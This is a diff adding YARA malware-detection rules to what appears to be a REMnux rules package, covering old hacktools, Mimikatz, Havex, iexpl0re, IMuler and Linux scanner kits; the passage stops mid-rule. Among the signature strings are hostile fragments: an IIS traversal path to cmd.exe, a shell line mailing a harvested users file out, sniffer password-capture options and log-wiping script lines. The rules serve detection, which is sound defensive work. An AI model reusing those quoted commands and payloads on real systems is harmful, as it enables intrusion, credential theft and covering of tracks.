+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
+	strings:
+		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
+		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule FPipe2_0 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "891609db7a6787575641154e7aab7757e74d837b"
+	strings:
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = " -s    - outbound connection source port number" fullword ascii
+		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s4 = "http://www.foundstone.com" fullword ascii
+		$s19 = "FPipe" fullword ascii
+	condition:
+		all of them
+}
+
+rule InstGina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
+	strings:
+		$s0 = "To Open Registry" fullword ascii
+		$s4 = "I love Candy very much!!" ascii
+		$s5 = "GinaDLL" fullword ascii
+	condition:
+		all of them
+}
+
+rule ArtTray_zip_Folder_ArtTray {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
+	strings:
+		$s0 = "http://www.brigsoft.com" fullword wide
+		$s2 = "ArtTrayHookDll.dll" fullword ascii
+		$s3 = "ArtTray Version 1.0 " fullword wide
+		$s16 = "TRM_HOOKCALLBACK" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_findoor {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
+	strings:
+		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
+		$s8 = "PASS hacker@hacker.com" fullword ascii
+		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
+		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
+		$s11 = "http://isno.yeah.net" fullword ascii
+	condition:
+		4 of them
+}
+
+rule aspbackdoor_ipclear {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
+	strings:
+		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule WinEggDropShellFinal_zip_Folder_InjectT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
+	strings:
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "2TInject.Dll" fullword ascii
+		$s2 = "Windows Services" fullword ascii
+		$s3 = "Findrst6" fullword ascii
+		$s4 = "Press Any Key To Continue......" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_rshsvc {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
+	strings:
+		$s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii
+		$s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii
+		$s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii
+		$s10 = "copy %1\\rshsvc.exe" fullword ascii
+		$s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii
+		$s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii
+		$s18 = "pushd %SystemRoot%\\system32" fullword ascii
+	condition:
+		all of them
+}
+
+rule gina_zip_Folder_gina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file gina.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
+	strings:
+		$s0 = "NEWGINA.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s3 = "WlxActivateUserShell" fullword ascii
+		$s6 = "WlxWkstaLockedSAS" fullword ascii
+		$s13 = "WlxIsLockOk" fullword ascii
+		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s16 = "WlxShutdown" fullword ascii
+		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule superscan3_0 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
+	strings:
+		$s0 = "\\scanner.ini" fullword ascii
+		$s1 = "\\scanner.exe" fullword ascii
+		$s2 = "\\scanner.lst" fullword ascii
+		$s4 = "\\hensss.lst" fullword ascii
+		$s5 = "STUB32.EXE" fullword wide
+		$s6 = "STUB.EXE" fullword wide
+		$s8 = "\\ws2check.exe" fullword ascii
+		$s9 = "\\trojans.lst" fullword ascii
+		$s10 = "1996 InstallShield Software Corporation" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_xsniff {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+	strings:
+		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s3 = "%s - simple sniffer for win2000" fullword ascii
+		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s7 = "http://www.xfocus.org" fullword ascii
+		$s9 = "  -pass        : Filter username/password" fullword ascii
+		$s18 = "  -udp         : Output udp packets" fullword ascii
+		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s20 = "  -tcp         : Output tcp packets" fullword ascii
+	condition:
+		6 of them
+}
+
+rule sig_238_fscan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
+	strings:
+		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
+		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
+		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
+		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
+		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
+		$s13 = "http://www.foundstone.com" fullword ascii
+		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
+		$s18 = "Bind port number out of range. Using system default." fullword ascii
+		$s19 = "fscan.exe" fullword wide
+	condition:
+		4 of them
+}
+
+rule _iissample_nesscan_twwwscan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		super_rule = 1
+		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
+		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
+		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
+	strings:
+		$s0 = "Connecting HTTP Port - Result: " fullword
+		$s1 = "No space for command line argument vector" fullword
+		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
+		$s5 = "No space for copy of command line" fullword
+		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
+		$s8 = "scanf : floating point formats not linked" fullword
+		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
+		$s13 = "!\"what?\"" fullword
+		$s14 = "%s Port %d Closed" fullword
+		$s16 = "printf : floating point formats not linked" fullword
+		$s17 = "xxtype.cpp" fullword
+	condition:
+		all of them
+}
+
+rule _FsHttp_FsPop_FsSniffer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		super_rule = 1
+		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
+		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
+		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
+	strings:
+		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
+		$s1 = "-ERR Get SMS Users ID Failed" fullword
+		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
+		$s3 = "-ERR Post SMS Failed" fullword
+		$s4 = "Current.hlt" fullword
+		$s6 = "Histroy.hlt" fullword
+		$s7 = "-ERR Send SMS Failed" fullword
+		$s12 = "-ERR Change Password <New Password>" fullword
+		$s17 = "+OK Send SMS Succussifully" fullword
+		$s18 = "+OK Set New Password: [%s]" fullword
+		$s19 = "CHANGE PASSWORD" fullword
+	condition:
+		all of them
+}
+
+rule Ammyy_Admin_AA_v3 {
+	meta:
+		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
+		author = "Florian Roth"
+		reference = "http://goo.gl/gkAg2E"
+		date = "2014/12/22"
+		score = 55
+		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
+		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"		
+	strings:
+		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
+		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
+		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
+		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
+		$x5 = "Please enter password for accessing remote computer" fullword ascii
+		
+		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
+		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
+		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
+		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
+	condition:
+		2 of ($x*) or all of ($s*)
+}
+
+/* Other dumper and custom hack tools */
+
+rule Mimikatz_Samples_2014b_1 {
+	meta:
+		description = "Mimikatz pwassword dumper samples from the second half of 2014"
+		author = "Florian Roth with the help of YarGen Rule Generator"
+		reference = "not set"
+		date = "2014/12/23"
+		score = 80
+		hash = "ef5bd09b2e5836b58a8b27c1fb3650621aaf6488"
+	strings:
+		$s1 = "Raw command (not implemented yet) : %s" fullword wide
+		$s3 = " ! ZwSetInformationProcess 0x%08x for %u/%-14S" fullword wide
+		$s6 = "PsSetCreateProcessNotifyRoutineEx" fullword wide
+		$s10 = "\\Device\\mimidrv" fullword wide
+		$s16 = "\\DosDevices\\mimidrv" fullword wide
+		$s17 = "All privileges for the access token from %u/%-14S" fullword wide
+		$s20 = "in (0x%p - %u) ; out (0x%p - %u)" fullword wide
+	condition:
+		all of them
+}
+
+rule Mimikatz_Samples_2014b_2 {
+	meta:
+		description = "Mimikatz pwassword dumper samples from the second half of 2014"
+		author = "Florian Roth with the help of YarGen Rule Generator"
+		reference = "not set"
+		date = "2014/12/23"
+		score = 80		
+		hash = "98033f5bbdd79b12a7804bad0698c91e6d5067ad"
+	strings:
+		$s0 = "0: kd> .process /r /p <EPROCESS address>" fullword ascii
+		$s4 = "%p - lsasrv!LogonSessionListCount" fullword ascii
+		$s7 = "%p - lsasrv!LogonSessionList" fullword ascii
+		$s12 = "livessp!LiveGlobalLogonSessionList" fullword ascii
+		$s13 = "UndefinedLogonType" fullword ascii
+		$s14 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii
+		$s15 = "masterkey" fullword ascii
+		$s16 = "kerberos!KerbGlobalLogonSessionTable" fullword ascii
+		$s17 = "RemoteInteractive" fullword ascii
+		$s18 = "mimilib.dll" fullword wide
+		$s19 = "%p - lsasrv!InitializationVector" fullword ascii
+		$s20 = "lsasrv!LogonSessionListCount" fullword ascii
+	condition:
+		all of them
+}
+
+rule Mimikatz_Samples_2014b_Family_2 {
+	meta:
+		description = "Mimikatz pwassword dumper samples from the second half of 2014"
+		author = "Florian Roth with the help of YarGen Rule Generator"
+		date = "2014/12/23"
+		super_rule = 1
+		score = 80		
+		hash0 = "61001a32c5388e629dd0441a77974200057816ef"
+		hash1 = "46df272cecb541aebca3c863802c0d0a0dc5fcb4"
+		hash2 = "c3307bb70efa19fc5049dfd829d07ea52a65bb74"
+		hash3 = "29d9bfc4e4884bc7b2f3cd01960b727c17fb50cb"
+		hash4 = "ac1d1db32ca6e7af5625f0f6fbe210fe68002b5c"
+	strings:
+		$s0 = "ncryptprov.dll" fullword wide
+		$s1 = "CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY" fullword wide
+		$s2 = "logonPasswords" fullword wide
+		$s3 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE" fullword wide
+		$s4 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY" fullword wide
+		$s5 = "inject" fullword wide
+		$s6 = "MS_DEF_RSA_SCHANNEL_PROV" fullword wide
+		$s7 = "MS_ENHANCED_PROV" fullword wide
+		$s8 = "MS_DEF_RSA_SIG_PROV" fullword wide
+		$s9 = "privilege" fullword wide
+		$s10 = "MS_ENH_RSA_AES_PROV" fullword wide
+		$s16 = "sekurlsa" fullword wide
+		$s17 = "answer" fullword wide
+		$s18 = "secrets" fullword wide
+		$s19 = "MS_DEF_DSS_PROV" fullword wide
+		$s20 = "MS_DEF_PROV" fullword wide
+	condition:
+		all of them
+}
+
+rule LinuxHacktool_eyes_screen {
+	meta:
+		description = "Linux hack tools - file screen"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
+	strings:
+		$s0 = "or: %s -r [host.tty]" fullword ascii
+		$s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii
+		$s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii
+		$s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii
+		$s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii
+		$s11 = "command from %s: %s %s" fullword ascii
+		$s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii
+		$s19 = "[ Passwords don't match - checking turned off ]" fullword ascii
+	condition:
+		all of them
+}
+
+rule LinuxHacktool_eyes_scanssh {
+	meta:
+		description = "Linux hack tools - file scanssh"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
+	strings:
+		$s0 = "Connection closed by remote host" fullword ascii
+		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
+		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
+		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
+		$s5 = "Server closed connection" fullword ascii
+		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s9 = "Remote host closed connection" fullword ascii
+		$s10 = "%s: line %d: bad command `%s'" fullword ascii
+		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
+		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
+	condition:
+		all of them
+}
+rule LinuxHacktool_eyes_scanner {
+	meta:
+		description = "Linux hack tools - file scanner"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "5488698b7f9090f45096517e61768efd32299d5b"
+	strings:
+		$s0 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s1 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s3 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s4 = "truncated dump file; tried to read %d header bytes, only got %lu" fullword ascii
+		$s5 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s7 = "'protochain' not supported with radiotap headers" fullword ascii
+		$s8 = "%s(): unsuported injection type" fullword ascii
+		$s9 = "ELF load command address/offset not properly aligned" fullword ascii
+		$s10 = "@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.221.2.27 2005/07/14 16:01:46" ascii
+		$s20 = "%s%s%s:%u: %s%sAssertion `%s' failed." fullword ascii
+	condition:
+		4 of them
+}
+rule LinuxHacktool_eyes_pscan2 {
+	meta:
+		description = "Linux hack tools - file pscan2"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
+	strings:
+		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
+		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
+		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
+		$s8 = "Invalid IP." fullword ascii
+		$s9 = "# scanning: " fullword ascii
+		$s10 = "Unable to allocate socket." fullword ascii
+	condition:
+		2 of them
+}
+
+rule LinuxHacktool_eyes_a {
+	meta:
+		description = "Linux hack tools - file a"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
+	strings:
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "mv scan.log bios.txt" fullword ascii
+		$s2 = "rm -rf bios.txt" fullword ascii
+		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
+		$s4 = "././pscan2 $1 22" fullword ascii
+		$s10 = "echo \"#cautam...\"" fullword ascii
+	condition:
+		2 of them
+}
+
+rule LinuxHacktool_eyes_mass {
+	meta:
+		description = "Linux hack tools - file mass"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "2054cb427daaca9e267b252307dad03830475f15"
+	strings:
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
+		$s3 = "killall -9 pscan2" fullword ascii
+		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
+		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
+	condition:
+		1 of them
+}
+
+rule LinuxHacktool_eyes_pscan2_2 {
+	meta:
+		description = "Linux hack tools - file pscan2.c"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
+	strings:
+		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
+		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
+		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
+		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
+		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
+	condition:
+		2 of them
+}
+
+rule CN_Portscan : APT
+{
+    meta:
+        description = "CN Port Scanner"
+        author = "Florian Roth"
+        release_date = "2013-11-29"
+        confidential = false
+		score = 70
+    strings:
+    	$s1 = "MZ"
+		$s2 = "TCP 12.12.12.12"
+    condition:
+        ($s1 at 0) and $s2
+}
+
+rule WMI_vbs : APT 
+{
+    meta:
+        description = "WMI Tool - APT"
+        author = "Florian Roth"
+        release_date = "2013-11-29"
+        confidential = false
+		score = 70
+    strings:
+		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"  
+    condition:
+        all of them	
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Havex.yara remnux-rules-0.0.4/yara.old/Havex.yara
--- remnux-rules-0.0.3/yara.old/Havex.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Havex.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,72 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule Win32OPCHavex
+{
+    meta:
+        Author      = "BAE Systems"
+        Date        = "2014/06/23"
+        Description = "Rule for identifying OPC version of HAVEX"
+        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
+
+    strings:
+        $mzhdr = "MZ"
+        $dll = "7CFC52CD3F87.dll"
+        $a1 = "Start finging of LAN hosts..." wide
+        $a2 = "Finding was fault. Unexpective error" wide
+        $a3 = "Was found %i hosts in LAN:" wide
+        $a4 = "Hosts was't found." wide
+        $a5 = "Start finging of OPC Servers..." wide
+        $a6 = "Was found %i OPC Servers." wide
+        $a7 = "OPC Servers not found. Programm finished" wide
+        $a8 = "%s[%s]!!!EXEPTION %i!!!" wide
+        $a9 = "Start finging of OPC Tags..." wide
+
+    condition:
+        $mzhdr at 0 and ($dll or (any of ($a*)))
+}
+
+rule Win32FertgerHavex
+{
+    meta:
+        Author      = "BAE Systems"
+        Date        = "2014/06/23"
+        Description = "Rule for identifying Fertger version of HAVEX"
+        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
+
+    strings:
+        $mz = "MZ"
+        $a1="\\\\.\\pipe\\mypipe-f" wide
+        $a2="\\\\.\\pipe\\mypipe-h" wide
+        $a3="\\qln.dbx" wide
+        $a4="*.yls" wide
+        $a5="\\*.xmd" wide
+        $a6="fertger" wide
+        $a7="havex"
+    
+    condition:
+        $mz at 0 and 3 of ($a*) 
+}
+
+rule Havex_Trojan_PHP_Server
+{
+    meta:
+        Author      = "Florian Roth"
+        Date        = "2014/06/24"
+        Description = "Detects the PHP server component of the Havex RAT"
+        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
+
+    strings:
+        $s1 = "havex--></body></head>"
+        $s2 = "ANSWERTAG_START"
+        $s3 = "PATH_BLOCKFILE"
+
+    condition:
+        all of them
+} 
+
diff -Nru remnux-rules-0.0.3/yara.old/iexpl0ree.yara remnux-rules-0.0.4/yara.old/iexpl0ree.yara
--- remnux-rules-0.0.3/yara.old/iexpl0ree.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/iexpl0ree.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,66 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule iexpl0reCode : iexpl0ree Family 
+{
+    meta:
+        description = "iexpl0re code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+        
+    strings:
+        $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
+        $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
+        $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
+        $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
+        // 88h decrypt
+        $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+        $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+        
+    condition:
+        any of them
+}
+
+rule iexpl0reStrings : iexpl0re Family
+{
+    meta:
+        description = "Strings used by iexpl0re"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+        
+    strings:
+        $ = "%USERPROFILE%\\IEXPL0RE.EXE"
+        $ = "\"<770j (("
+        $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
+        $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
+        $ = "LoaderV5.dll"
+        // stage 2
+        $ = "POST /index%0.9d.asp HTTP/1.1"
+        $ = "GET /search?n=%0.9d&"
+        $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
+        $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
+        $ = "BASTARD_&&_BITCHES_%0.8x"
+        $ = "c:\\bbb\\eee.txt"
+        
+    condition:
+        any of them
+
+}
+
+rule iexpl0re : Family
+{
+    meta:
+        description = "iexpl0re family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+   
+    condition:
+        iexpl0reCode or iexpl0reStrings
+        
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/IMuler.yara remnux-rules-0.0.4/yara.old/IMuler.yara
--- remnux-rules-0.0.3/yara.old/IMuler.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/IMuler.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,67 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule IMulerCode : IMuler Family 
+{
+    meta:
+        description = "IMuler code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    strings:
+        // Load these function strings 4 characters at a time. These check the first two blocks:
+        $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
+        $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
+        $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
+        $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
+        $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
+        
+    condition:
+        any of ($L4*)
+}
+
+rule IMulerStrings : IMuler Family
+{
+    meta:
+        description = "IMuler Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    strings:
+        $ = "/cgi-mac/"
+        $ = "xnocz1"
+        $ = "checkvir.plist"
+        $ = "/Users/apple/Documents/mac back"
+        $ = "iMuler2"
+        $ = "/Users/imac/Desktop/macback/"
+        $ = "xntaskz.gz"
+        $ = "2wmsetstatus.cgi"
+        $ = "launch-0rp.dat"
+        $ = "2wmupload.cgi"
+        $ = "xntmpz"
+        $ = "2wmrecvdata.cgi"
+        $ = "xnorz6"
+        $ = "2wmdelfile.cgi"
+        $ = "/LanchAgents/checkvir"
+        $ = "0PERA:%s"
+        $ = "/tmp/Spotlight"
+        $ = "/tmp/launch-ICS000"
+        
+    condition:
+        any of them
+}
+
+rule IMuler : Family
+{
+    meta:
+        description = "IMuler"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    condition:
+        IMulerCode or IMulerStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Install11.yara remnux-rules-0.0.4/yara.old/Install11.yara
--- remnux-rules-0.0.3/yara.old/Install11.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Install11.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Insta11Code : Insta11 Family 
+{
+    meta:
+        description = "Insta11 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+    
+    strings:
+        // jmp $+5; push 423h
+        $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
+    
+    condition:
+        any of them
+}
+
+rule Insta11Strings : Insta11 Family
+{
+    meta:
+        description = "Insta11 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "XTALKER7"
+        $ = "Insta11 Microsoft" wide ascii
+        $ = "wudMessage"
